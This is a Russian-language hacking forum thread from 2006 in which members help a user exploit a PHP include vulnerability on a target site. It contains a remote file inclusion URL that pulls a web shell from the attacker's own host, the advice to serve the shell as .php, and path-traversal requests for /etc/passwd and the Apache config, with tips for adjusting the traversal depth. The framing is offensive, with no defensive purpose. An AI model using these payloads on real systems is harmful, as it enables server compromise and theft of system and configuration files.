инклуд

Discussion in 'Уязвимости' started by Foblas, 13 Mar 2006.

  1. Foblas

    Foblas New Member

    Joined:
    7 Mar 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    вот чтоу меня получилось:
    запрос допустим такой- http://www.target.com/index1.php?page=http://mysite.com/shell.txt

    в браузере вижу - Warning: Failed opening './http://mypage.org/shell.txt' for inclusion (include_path='.:/usr/share/pear:/home/httpd/phplib') in /home/target/public_html/index1.php on line 63

    ./ - возможно ли как-то обойти, чтобы заинклудить файл/скрипт/что_нибудь_ещё?

    Не гнобите сильно, если это проскакивает тут в стотысячный раз )
     
  2. ArdeOS

    ArdeOS Elder - Старейшина

    Joined:
    16 Jul 2004
    Messages:
    137
    Likes Received:
    64
    Reputations:
    15
    шелл нужно заливать на сайт с расширением php (!) А не с тхт - он выполнятся должен, а серевер на котором возможно есть инклуд, воспринимает его как обычный текстовик.
    И еще на конце не нужно писать расширение пхп - http://mypage.com/shell если не катит то можно попробыва добавить его - в разных системах по разному ;)
     
  3. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    Нет, ./ не обойти. В твоем случае можно выполнять лишь локальный инклуд
     
    _________________________
  4. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    попробуй
    __http://www.target.com/index1.php?page=../../../etc/passwd

    Если пройдёт то
    __http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
     
  5. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    опять же непонятно число уровней до корневой директории с корня веб-сервака. т.е. количество "../" менять постепенно вверх.
    [offtop]
    ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
    [/offtop]
     
    _________________________
  6. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Ночной дозор. Всем выйти из сумрака! :)
     
  7. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    никогда не понимал смысл вот этого
    наверное статьи аля 80х, где цель всегда passwd, оставили свой след...
     
  8. Foblas

    Foblas New Member

    Joined:
    7 Mar 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0

    Пробовал впервую очередь, всё равно добавляет это злобное ./ (
     
  9. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    [offtop]
    Trinux он же и в МОА ив АМА
    [/offtop]